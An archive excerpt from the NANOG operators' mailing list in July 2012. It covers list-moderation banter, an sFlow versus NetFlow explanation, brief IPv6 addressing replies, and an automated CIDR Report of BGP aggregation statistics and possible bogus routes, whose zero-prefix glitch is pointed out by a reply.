From: jared at puck.nether.net (Jared Mauch)
Date: Fri, 13 Jul 2012 15:51:14 -0400
Subject: Communications Committee volunteers [was: The Cidr Report]
In-Reply-To:
References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> <500066FC.6030707@gmail.com>
Message-ID: <9C1A5586-E64C-4B3A-8978-10CDC479E275@puck.nether.net>

On Jul 13, 2012, at 3:49 PM, Patrick W. Gilmore wrote:

> On Jul 13, 2012, at 14:20 , JC Dill wrote:
>> On 13/07/12 10:46 AM, Grant Ridder wrote:
>
>>> if the admins are not going to moderate this list... give me the admin
>>> password to the list serve and i will set it up right... gees
>>
>> +1
>
> Most excellent!
>
> Just so you know, "the admins" are the Communications Committee, and they are always looking for new volunteers.
>
> I assume you both will be volunteering forthwith?

They already did in public. I don't think they can turn it down now :)

- Jared

From shortdudey123 at gmail.com  Fri Jul 13 15:02:29 2012
From: shortdudey123 at gmail.com (Grant Ridder)
Date: Fri, 13 Jul 2012 15:02:29 -0500
Subject: Communications Committee volunteers [was: The Cidr Report]
In-Reply-To: <9C1A5586-E64C-4B3A-8978-10CDC479E275@puck.nether.net>
References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> <500066FC.6030707@gmail.com> <9C1A5586-E64C-4B3A-8978-10CDC479E275@puck.nether.net>
Message-ID:

The admins say they are working on a content filter system. All you really
should have to do is keyword filtering in mailman. I have this set up on
a mailing list that I manage.
On Fri, Jul 13, 2012 at 2:51 PM, Jared Mauch wrote:

>
> On Jul 13, 2012, at 3:49 PM, Patrick W. Gilmore wrote:
>
> > On Jul 13, 2012, at 14:20 , JC Dill wrote:
> >> On 13/07/12 10:46 AM, Grant Ridder wrote:
> >
> >>> if the admins are not going to moderate this list... give me the admin
> >>> password to the list serve and i will set it up right... gees
> >>
> >> +1
> >
> > Most excellent!
> >
> > Just so you know, "the admins" are the Communications Committee, and
> they are always looking for new volunteers.
> >
> > I assume you both will be volunteering forthwith?
>
> They already did in public. I don't think they can turn it down now :)
>
> - Jared
>
>

From robertg at garlic.com  Fri Jul 13 15:03:54 2012
From: robertg at garlic.com (Robert Glover)
Date: Fri, 13 Jul 2012 13:03:54 -0700
Subject: Akamai infrastructure tech
In-Reply-To: <500069AD.7040705@garlic.com>
References: <500069AD.7040705@garlic.com>
Message-ID: <50007F2A.205@garlic.com>

Thanks to everyone who responded; we've got this completely taken care of!

On 07/13/2012 11:32 AM, Robert Glover wrote:
> If someone with Akamai is watching, can you please have someone from
> infrastructure contact me?  We host an Akamai server, a drive started
> taking errors, Akamai shipped us a new drive, but did not tell us which
> of the eight drives in the server needs to be replaced.
>
> Normal contact channels have resulted in voicemail or no clue :(
>
> Thanks,
> -Robert
>

From sean at seanharlow.info  Fri Jul 13 15:13:33 2012
From: sean at seanharlow.info (Sean Harlow)
Date: Fri, 13 Jul 2012 16:13:33 -0400
Subject: Communications Committee volunteers [was: The Cidr Report]
In-Reply-To:
References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> <500066FC.6030707@gmail.com> <9C1A5586-E64C-4B3A-8978-10CDC479E275@puck.nether.net>
Message-ID:

On Jul 13, 2012, at 16:02, Grant Ridder wrote:

> The admins say they are working on a content filter system. All you really
> should have to do is keyword filtering in mailman. I have this set up on
> a mailing list that I manage.

How well would that actually work against what seems to be a bored individual with nothing better to do but send this stuff here? Any keyword filters can be easily circumvented in the same way spammers have done for years. We'll just be seeing these stories with lots of "pen1s" or similar quick edits.

From peter.phaal at gmail.com  Fri Jul 13 15:20:45 2012
From: peter.phaal at gmail.com (Peter Phaal)
Date: Fri, 13 Jul 2012 13:20:45 -0700
Subject: Real world sflow vs netflow?
In-Reply-To:
References:
Message-ID:

Hi David,

The main architectural difference between sFlow and Netflow is the location of the flow cache:

1. NetFlow: Packets are decoded on the router, flow keys are extracted and used to lookup/create an entry in a flow cache which is then updated based on values in the packet. Records are exported from the flow cache in the form of Netflow datagrams when the flow completes or based on a timeout.

2. sFlow: Packets are randomly sampled in hardware and the packet headers are immediately exported as sFlow datagrams - there is no flow cache on the switch/router.
In addition to exporting the packet header, the sFlow agent captures the FIB state associated with forwarding the sampled packet, exporting information such as next hop router, AS-path, communities etc. An sFlow agent also periodically sends all the MIB-II interface counters, eliminating the need for SNMP polling - this isn't very important if you are only monitoring a few links, but makes a big difference if you are monitoring large chassis switches or tens or hundreds of thousands of ports in a data center or campus environment.

Moving the flow cache off the router has a number of benefits:

1. You are no longer limited by the hardware/firmware capabilities of the router - your analysis software decides which fields to decode and how to accumulate results. For example, if you are managing a mixed IPv4/IPv6 environment you can decide to use sFlow to look into v6 over v4 and v4 over v6 tunnels (to do the same thing with Netflow would likely require a hardware upgrade). You can even feed sFlow into Wireshark for detailed analysis of protocols and packet headers.

2. Operational complexity is greatly reduced since the configuration options and resource management issues associated with the flow cache are eliminated.

3. Low latency. Measurements aren't delayed by the flow cache - you can detect DDoS attacks/large flows within seconds.

4. Scalability - you can turn on sFlow on every link (even 100G links), on every device for a comprehensive view of traffic.

5. Multi-vendor interoperability. The sFlow measurements are interoperable across vendors (since very little processing is performed on the devices). With NetFlow, different vendors and devices have different hardware limitations affecting the fields that they can export.

Unsampled Netflow is only practical for moderate traffic levels. If you carry significant traffic you would want to enable sampling anyway, even with Netflow.
However, there are a wide range of Netflow sampling implementations, many of which yield questionable results. In contrast, the sFlow standard specifies how sampling must be performed and ensures that information is included that allows the sampled data to be correctly scaled and produce unbiased measurements.

Cheers,
Peter

On Fri, Jul 13, 2012 at 10:30 AM, David Hubbard wrote:
> Can anyone on or off list give me some real world
> thoughts on sflow vs netflow for border
> routers?  (multi-homed, BGP, straight v4 & v6 only
> for web hosting, no mpls, vpns, vlans, etc.)
>
> Finding it hard to decipher the vendor version
> of the answer to that question.  We use
> netflow v9 currently but are considering hardware
> that would be sflow.  We don't use it for
> billing purposes, mostly for spotting malicious
> remote hosts doing things like scans, spotting
> traffic such as weird ports in use in either
> direction that warrant further investigation,
> watching for ddos/dos destinations to act on
> mitigation, or investigating the nature of unusual
> levels of traffic on switch ports that set off
> alarms.  I'm concerned things like port scans,
> etc. won't be picked up by the NMS if fed by
> sflow due to the sampling nature, or similar
> concern if 500 ssh connections by the same remote
> host are sampled as 1 connection, etc.  Of course
> these concerns were put in my head by someone
> interested in me continuing to use equipment that
> happens to output netflow data, hence me wanting some
> real people answers.  :-)
>
> Thanks!
>
>

From randy at psg.com  Fri Jul 13 18:24:31 2012
From: randy at psg.com (Randy Bush)
Date: Sat, 14 Jul 2012 08:24:31 +0900
Subject: using "reserved" IPv6 space
In-Reply-To: <500042B5.4030502@gmail.com>
References: <500032E4.40804@gmail.com> <500042B5.4030502@gmail.com>
Message-ID:

keep life simple.  use global ipv6 space.
randy

From owen at delong.com  Fri Jul 13 19:30:08 2012
From: owen at delong.com (Owen DeLong)
Date: Fri, 13 Jul 2012 17:30:08 -0700
Subject: using "reserved" IPv6 space
In-Reply-To:
References: <500032E4.40804@gmail.com> <500042B5.4030502@gmail.com>
Message-ID: <42FE7891-32BC-4C67-B814-D37D74EE0581@delong.com>

On Jul 13, 2012, at 4:24 PM, Randy Bush wrote:

> keep life simple.  use global ipv6 space.
>
> randy

Though it is rare, this is one time when I absolutely agree with Randy.

Owen

From jloiacon at csc.com  Fri Jul 13 20:30:37 2012
From: jloiacon at csc.com (Joe Loiacono)
Date: Fri, 13 Jul 2012 21:30:37 -0400
Subject: Real world sflow vs netflow?
In-Reply-To:
References:
Message-ID:

Peter Phaal wrote on 07/13/2012 04:20:45 PM:

> 2. sFlow: Packets are randomly sampled in hardware and the packet
> headers are immediately exported as sFlow datagrams - there is no flow
> cache on the switch/router. In addition to exporting the packet
> header, the sFlow agent captures the FIB state associated with
> forwarding the sampled packet, exporting information such as next hop
> router, AS-path, communities etc

What about byte counts? Just those in the sampled packet (i.e., no running totals per flow)?

> In contrast, the sFlow standard specifies how sampling must be performed
> and ensures that information is included that allows the sampled data
> to be correctly scaled and produce unbiased measurements.

Does sflow software typically recreate the total byte count per flow (e.g., TCP session) by scaling?
Thanks,

Joe

From bross at pobox.com  Fri Jul 13 20:41:23 2012
From: bross at pobox.com (Brandon Ross)
Date: Fri, 13 Jul 2012 21:41:23 -0400 (EDT)
Subject: using "reserved" IPv6 space
In-Reply-To: <42FE7891-32BC-4C67-B814-D37D74EE0581@delong.com>
References: <500032E4.40804@gmail.com> <500042B5.4030502@gmail.com> <42FE7891-32BC-4C67-B814-D37D74EE0581@delong.com>
Message-ID:

On Fri, 13 Jul 2012, Owen DeLong wrote:

> On Jul 13, 2012, at 4:24 PM, Randy Bush wrote:
>
>> keep life simple.  use global ipv6 space.
>>
>> randy
>
> Though it is rare, this is one time when I absolutely agree with Randy.

It's even more rare for me to agree with Randy AND Owen at the same time.

--
Brandon Ross                                      Yahoo & AIM:  BrandonNRoss
+1-404-635-6667                                                ICQ:  2269442
Schedule a meeting:  https://tungle.me/bross                Skype:  brandonross

From cidr-report at potaroo.net  Fri Jul 13 17:00:00 2012
From: cidr-report at potaroo.net (cidr-report at potaroo.net)
Date: Fri, 13 Jul 2012 22:00:00 GMT
Subject: The Cidr Report
Message-ID: <201207132200.q6DM00xM047173@wattle.apnic.net>

This report has been generated at Fri Jul 13 21:10:00 2012 AEST.
The report analyses the BGP Routing Table of AS2.0 router
and generates a report on aggregation potential within the table.

Check http://www.cidr-report.org for a current version of this report.

Recent Table History
        Date      Prefixes    CIDR Agg
        06-07-12    418603      242444
        07-07-12    418670      242326
        08-07-12    418651      242260
        09-07-12    417976      242235
        10-07-12    418251      242235
        11-07-12         0      242235
        12-07-12         0      242235
        13-07-12         0      242235


AS Summary
         0  Number of ASes in routing system
         0  Number of ASes announcing only one prefix
      3390  Largest number of prefixes announced by an AS
            AS6389 : BELLSOUTH-NET-BLK - BellSouth.net Inc.
         0  Largest address span announced by an AS (/32s)
            ????? : BELLSOUTH-NET-BLK - BellSouth.net Inc.


Aggregation Summary
The algorithm used in this report proposes aggregation only
when there is a precise match using the AS path, so as
to preserve traffic transit policies.
Aggregation is also proposed across non-advertised address space ('holes').

 --- 13Jul12 ---
ASnum    NetsNow NetsAggr  NetGain   % Gain   Description

Table     418251   242235   176016    42.1%   All ASes

AS6389      3390      190     3200    94.4%   BELLSOUTH-NET-BLK - BellSouth.net Inc.
AS7029      3281     1636     1645    50.1%   WINDSTREAM - Windstream Communications Inc
AS17974     2146      606     1540    71.8%   TELKOMNET-AS2-AP PT Telekomunikasi Indonesia
AS22773     1655      136     1519    91.8%   ASN-CXA-ALL-CCI-22773-RDC - Cox Communications Inc.
AS4766      2710     1251     1459    53.8%   KIXS-AS-KR Korea Telecom
AS18566     2088      706     1382    66.2%   COVAD - Covad Communications Co.
AS28573     1986      622     1364    68.7%   NET Servicos de Comunicao S.A.
AS2118      1288       15     1273    98.8%   RELCOM-AS OOO "NPO Relcom"
AS4323      1576      386     1190    75.5%   TWTC - tw telecom holdings, inc.
AS1785      1934      814     1120    57.9%   AS-PAETEC-NET - PaeTec Communications, Inc.
AS10620     1983      897     1086    54.8%   Telmex Colombia S.A.
AS4755      1612      561     1051    65.2%   TATACOMM-AS TATA Communications formerly VSNL is Leading ISP
AS7303      1452      457      995    68.5%   Telecom Argentina S.A.
AS7552      1124      234      890    79.2%   VIETEL-AS-AP Vietel Corporation
AS8151      1491      687      804    53.9%   Uninet S.A. de C.V.
AS18101      946      161      785    83.0%   RELIANCE-COMMUNICATIONS-IN Reliance Communications Ltd.DAKC MUMBAI
AS17908      827       60      767    92.7%   TCISL Tata Communications
AS4808      1106      352      754    68.2%   CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network
AS9394       888      162      726    81.8%   CRNET CHINA RAILWAY Internet(CRNET)
AS13977      839      123      716    85.3%   CTELCO - FAIRPOINT COMMUNICATIONS, INC.
AS8452      1166      518      648    55.6%   TE-AS TE-AS
AS3356      1106      465      641    58.0%   LEVEL3 Level 3 Communications
AS855        695       58      637    91.7%   CANET-ASN-4 - Bell Aliant Regional Communications, Inc.
AS17676      692       75      617    89.2%   GIGAINFRA Softbank BB Corp.
AS4780       841      245      596    70.9%   SEEDNET Digital United Inc.
AS22561     1023      428      595    58.2%   DIGITAL-TELEPORT - Digital Teleport Inc.
AS19262      998      405      593    59.4%   VZGNI-TRANSIT - Verizon Online LLC
AS24560     1036      448      588    56.8%   AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
AS3549       993      436      557    56.1%   GBLX Global Crossing Ltd.
AS4804       649       97      552    85.1%   MPX-AS Microplex PTY LTD

Total      43521    13231    30290    69.6%   Top 30 total


Possible Bogus Routes

        10.86.64.32/30       AS65530 -Private Use AS-
        10.86.64.36/30       AS65530 -Private Use AS-
        10.86.65.32/30       AS65530 -Private Use AS-
        10.86.65.36/30       AS65530 -Private Use AS-
        10.255.255.0/30      AS65530 -Private Use AS-
        10.255.255.4/30      AS65530 -Private Use AS-
        10.255.255.8/30      AS65530 -Private Use AS-
        14.192.0.0/22        AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.4.0/22        AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.8.0/22        AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.12.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.16.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.20.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.24.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.28.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        27.112.114.0/24      AS23884 PROENNET-AS Proimage Engineering and Communication Co.,Ltd.
        62.61.220.0/24       AS24974 TACHYON-EU Tachyon Europe BV
        62.61.221.0/24       AS24974 TACHYON-EU Tachyon Europe BV
        64.66.32.0/20        AS18864
        66.171.32.0/20       AS705   UUNET - MCI Communications Services, Inc. d/b/a Verizon Business
        66.180.239.0/24      AS35888 VIGNETTE - VIGNETTE CORPORATION
        66.207.32.0/20       AS23011
        66.245.176.0/20      AS19318 NJIIX-AS-1 - NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC
        66.251.128.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.133.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.134.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.136.0/21      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.140.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.141.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.142.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.143.0/24      AS3356  LEVEL3 Level 3 Communications
        69.46.224.0/20       AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers
        69.46.233.0/24       AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers
        69.46.236.0/24       AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers
        70.34.112.0/20       AS27589 MOJOHOST - MOJOHOST
        71.19.134.0/23       AS3313  INET-AS BT Italia S.p.A.
        72.35.224.0/22       AS30097 NUWAVE - NuWave
        72.35.229.0/24       AS30188 TELEVERGENCE - Televergence Solutions Inc.
        72.35.232.0/21       AS30097 NUWAVE - NuWave
        72.44.16.0/20        AS15054 HAMELTRONICS - Hameltronics, LLC
        74.91.48.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.49.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.50.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.51.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.52.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.53.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.54.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.55.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.56.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.57.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.58.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.59.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.60.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.61.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.62.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.63.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.115.124.0/23      AS46540
        74.115.126.0/24      AS11260 EASTLINK-HSI - EastLink
        81.22.64.0/20        AS5511  OPENTRANSIT France Telecom S.A.
        82.101.160.0/19      AS5511  OPENTRANSIT France Telecom S.A.
        110.34.44.0/22       AS12653 COMTONET KB Impuls Hellas S.A.
        116.206.72.0/24      AS6461  MFNX MFN - Metromedia Fiber Network
        116.206.85.0/24      AS6461  MFNX MFN - Metromedia Fiber Network
        116.206.103.0/24     AS6461  MFNX MFN - Metromedia Fiber Network
        117.120.56.0/21      AS4755  TATACOMM-AS TATA Communications formerly VSNL is Leading ISP
        120.136.17.0/24      AS38779 BMG-AS-ID Badan Meteorologi dan Geofisika
        121.46.0.0/16        AS4134  CHINANET-BACKBONE No.31,Jin-rong Street
        142.54.0.0/19        AS23498 CDSI - Cogeco Data Services LP
        172.14.0.0/24        AS57871 ASTELECENTR TeleCentr Ltd.
        172.15.0.0/24        AS57871 ASTELECENTR TeleCentr Ltd.
        172.45.1.0/24        AS3356  LEVEL3 Level 3 Communications
        172.102.0.0/22       AS4812  CHINANET-SH-AP China Telecom (Group)
        172.116.0.0/24       AS7018  ATT-INTERNET4 - AT&T Services, Inc.
        198.18.0.0/15        AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation
        198.51.100.0/24      AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation
        200.1.112.0/24       AS29754 GO2TEL GO2TEL.COM INC.
        200.6.49.0/24        AS23148 TERREMARK Terremark
        200.24.73.0/24       AS26061 Equant Colombia
        200.33.40.0/24       AS11172 Alestra, S. de R.L. de C.V.
        200.34.0.0/20        AS6342  Instituto Tecnológico y de Estudios Superiores de Monterrey
        200.53.0.0/19        AS13878 Diveo do Brasil Telecomunicacoes Ltda
        200.58.248.0/21      AS27849
        200.75.184.0/21      AS14754 Telgua
        200.106.128.0/20     AS3257  TINET-BACKBONE Tinet SpA
        200.115.112.0/20     AS3257  TINET-BACKBONE Tinet SpA
        202.1.224.0/24       AS10097 FLOWCOM Flow Communications 2/541 Kent St Sydney NSW 2000
        202.8.106.0/24       AS9530  SHINSEGAE-AS SHINSEGAE I&C Co., Ltd.
        202.58.113.0/24      AS19161
        202.83.120.0/21      AS37972
        202.83.124.0/24      AS37972
        202.83.125.0/24      AS37972
        202.83.126.0/24      AS37972
        202.94.1.0/24        AS4808  CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network
        202.140.128.0/19     AS9583  SIFY-AS-IN Sify Limited
        202.174.125.0/24     AS9498  BBIL-AP BHARTI Airtel Ltd.
        202.176.1.0/24       AS9942  COMINDICO-AP SOUL Converged Communications Australia
        202.179.134.0/24     AS23966 LDN-AS-PK LINKdotNET Telecom Limited
        203.0.113.0/24       AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation
        203.23.1.0/24        AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.24.38.0/24       AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.30.127.0/24      AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.32.86.0/23       AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.32.86.0/24       AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.32.87.0/24       AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.32.188.0/24      AS1221  ASN-TELSTRA Telstra Pty Ltd
        203.142.219.0/24     AS45149
        204.9.116.0/22       AS30097 NUWAVE - NuWave
        204.10.88.0/21       AS3356  LEVEL3 Level 3 Communications
        204.10.92.0/23       AS30097 NUWAVE - NuWave
        204.10.94.0/23       AS30097 NUWAVE - NuWave
        204.14.0.0/21        AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        204.14.0.0/24        AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        204.14.2.0/24        AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        204.14.3.0/24        AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        205.175.214.0/24     AS5583  ORANGE-BUSINESS-SERVICES-BENELUX France Telecom S.A.
        206.197.184.0/24     AS23304 DATOTEL-STL-AS - Datotel LLC, a NetLabs LLC Company
        207.174.131.0/24     AS26116 INDRA - Indra's Net Inc
        207.174.132.0/23     AS26116 INDRA - Indra's Net Inc
        207.174.152.0/23     AS26116 INDRA - Indra's Net Inc
        207.174.154.0/24     AS26116 INDRA - Indra's Net Inc
        207.174.155.0/24     AS26116 INDRA - Indra's Net Inc
        207.174.200.0/24     AS22658 EARTHNET - Earthnet, Inc.
        207.174.248.0/21     AS6653  PRIVATEI - privateI, LLC
        207.231.96.0/19      AS11194 NUNETPA - NuNet Inc.
        208.83.53.0/24       AS40569 YGOMI-AS - Ygomi LLC
        208.93.144.0/21      AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        208.93.151.0/24      AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        209.148.64.0/19      AS13773 TELNETCOMM - Telnet Communications
        209.177.64.0/20      AS6461  MFNX MFN - Metromedia Fiber Network
        209.213.0.0/20       AS33005 ELTOPIA - Eltopia.com, LLC
        213.150.202.0/24     AS8513  SKYVISION SkyVision Global Networks Ltd
        213.150.204.0/24     AS29338 AFOL-AS Used by Africaonline Operations
        216.12.160.0/20      AS26627 AS-PILOSOFT - Pilosoft, Inc.
        216.21.160.0/20      AS27876 American Data Networks
        216.155.176.0/20     AS16706
        216.194.160.0/20     AS27876 American Data Networks


Please see http://www.cidr-report.org for the full report

------------------------------------
Copies of this report are mailed to:
  nanog at nanog.org
  eof-list at ripe.net
  apops at apops.net
  routing-wg at ripe.net
  afnog at afnog.org

From patrick at ianai.net  Sat Jul 14 00:52:39 2012
From: patrick at ianai.net (Patrick W. Gilmore)
Date: Sat, 14 Jul 2012 01:52:39 -0400
Subject: The Cidr Report
In-Reply-To: <201207132200.q6DM00xM047173@wattle.apnic.net>
References: <201207132200.q6DM00xM047173@wattle.apnic.net>
Message-ID:

Composed on a virtual keyboard, please forgive typos.

On Jul 13, 2012, at 22:00, cidr-report at potaroo.net wrote:

> This report has been generated at Fri Jul 13 21:10:00 2012 AEST.
> The report analyses the BGP Routing Table of AS2.0 router
> and generates a report on aggregation potential within the table.
>
> Check http://www.cidr-report.org for a current version of this report.
>
> Recent Table History
>        Date      Prefixes    CIDR Agg
>        06-07-12    418603      242444
>        07-07-12    418670      242326
>        08-07-12    418651      242260
>        09-07-12    417976      242235
>        10-07-12    418251      242235
>        11-07-12         0      242235
>        12-07-12         0      242235
>        13-07-12         0      242235

Ahhh, oops?

Geoff, might want to check your scripts.
-- TTFN, patrick > AS Summary > 0 Number of ASes in routing system > 0 Number of ASes announcing only one prefix > 3390 Largest number of prefixes announced by an AS > AS6389 : BELLSOUTH-NET-BLK - BellSouth.net Inc. > 0 Largest address span announced by an AS (/32s) > ????? : BELLSOUTH-NET-BLK - BellSouth.net Inc. > > > Aggregation Summary > The algorithm used in this report proposes aggregation only > when there is a precise match using the AS path, so as > to preserve traffic transit policies. Aggregation is also > proposed across non-advertised address space ('holes'). > > --- 13Jul12 --- > ASnum NetsNow NetsAggr NetGain % Gain Description > > Table 418251 242235 176016 42.1% All ASes > > AS6389 3390 190 3200 94.4% BELLSOUTH-NET-BLK - > BellSouth.net Inc. > AS7029 3281 1636 1645 50.1% WINDSTREAM - Windstream > Communications Inc > AS17974 2146 606 1540 71.8% TELKOMNET-AS2-AP PT > Telekomunikasi Indonesia > AS22773 1655 136 1519 91.8% ASN-CXA-ALL-CCI-22773-RDC - > Cox Communications Inc. > AS4766 2710 1251 1459 53.8% KIXS-AS-KR Korea Telecom > AS18566 2088 706 1382 66.2% COVAD - Covad Communications > Co. > AS28573 1986 622 1364 68.7% NET Servicos de Comunicao S.A. > AS2118 1288 15 1273 98.8% RELCOM-AS OOO "NPO Relcom" > AS4323 1576 386 1190 75.5% TWTC - tw telecom holdings, > inc. > AS1785 1934 814 1120 57.9% AS-PAETEC-NET - PaeTec > Communications, Inc. > AS10620 1983 897 1086 54.8% Telmex Colombia S.A. > AS4755 1612 561 1051 65.2% TATACOMM-AS TATA > Communications formerly VSNL > is Leading ISP > AS7303 1452 457 995 68.5% Telecom Argentina S.A. > AS7552 1124 234 890 79.2% VIETEL-AS-AP Vietel > Corporation > AS8151 1491 687 804 53.9% Uninet S.A. de C.V. 
> AS18101 946 161 785 83.0% RELIANCE-COMMUNICATIONS-IN > Reliance Communications > Ltd.DAKC MUMBAI > AS17908 827 60 767 92.7% TCISL Tata Communications > AS4808 1106 352 754 68.2% CHINA169-BJ CNCGROUP IP > network China169 Beijing > Province Network > AS9394 888 162 726 81.8% CRNET CHINA RAILWAY > Internet(CRNET) > AS13977 839 123 716 85.3% CTELCO - FAIRPOINT > COMMUNICATIONS, INC. > AS8452 1166 518 648 55.6% TE-AS TE-AS > AS3356 1106 465 641 58.0% LEVEL3 Level 3 Communications > AS855 695 58 637 91.7% CANET-ASN-4 - Bell Aliant > Regional Communications, Inc. > AS17676 692 75 617 89.2% GIGAINFRA Softbank BB Corp. > AS4780 841 245 596 70.9% SEEDNET Digital United Inc. > AS22561 1023 428 595 58.2% DIGITAL-TELEPORT - Digital > Teleport Inc. > AS19262 998 405 593 59.4% VZGNI-TRANSIT - Verizon Online > LLC > AS24560 1036 448 588 56.8% AIRTELBROADBAND-AS-AP Bharti > Airtel Ltd., Telemedia > Services > AS3549 993 436 557 56.1% GBLX Global Crossing Ltd. > AS4804 649 97 552 85.1% MPX-AS Microplex PTY LTD > > Total 43521 13231 30290 69.6% Top 30 total > > > Possible Bogus Routes > > 10.86.64.32/30 AS65530 -Private Use AS- > 10.86.64.36/30 AS65530 -Private Use AS- > 10.86.65.32/30 AS65530 -Private Use AS- > 10.86.65.36/30 AS65530 -Private Use AS- > 10.255.255.0/30 AS65530 -Private Use AS- > 10.255.255.4/30 AS65530 -Private Use AS- > 10.255.255.8/30 AS65530 -Private Use AS- > 14.192.0.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 14.192.4.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 14.192.8.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 14.192.12.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 14.192.16.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 14.192.20.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 14.192.24.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 14.192.28.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 27.112.114.0/24 AS23884 PROENNET-AS Proimage Engineering and Communication Co.,Ltd. 
> 62.61.220.0/24 AS24974 TACHYON-EU Tachyon Europe BV > 62.61.221.0/24 AS24974 TACHYON-EU Tachyon Europe BV > 64.66.32.0/20 AS18864 > 66.171.32.0/20 AS705 UUNET - MCI Communications Services, Inc. d/b/a Verizon Business > 66.180.239.0/24 AS35888 VIGNETTE - VIGNETTE CORPORATION > 66.207.32.0/20 AS23011 > 66.245.176.0/20 AS19318 NJIIX-AS-1 - NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC > 66.251.128.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks > 66.251.133.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks > 66.251.134.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks > 66.251.136.0/21 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks > 66.251.140.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks > 66.251.141.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks > 66.251.142.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks > 66.251.143.0/24 AS3356 LEVEL3 Level 3 Communications > 69.46.224.0/20 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers > 69.46.233.0/24 AS32592 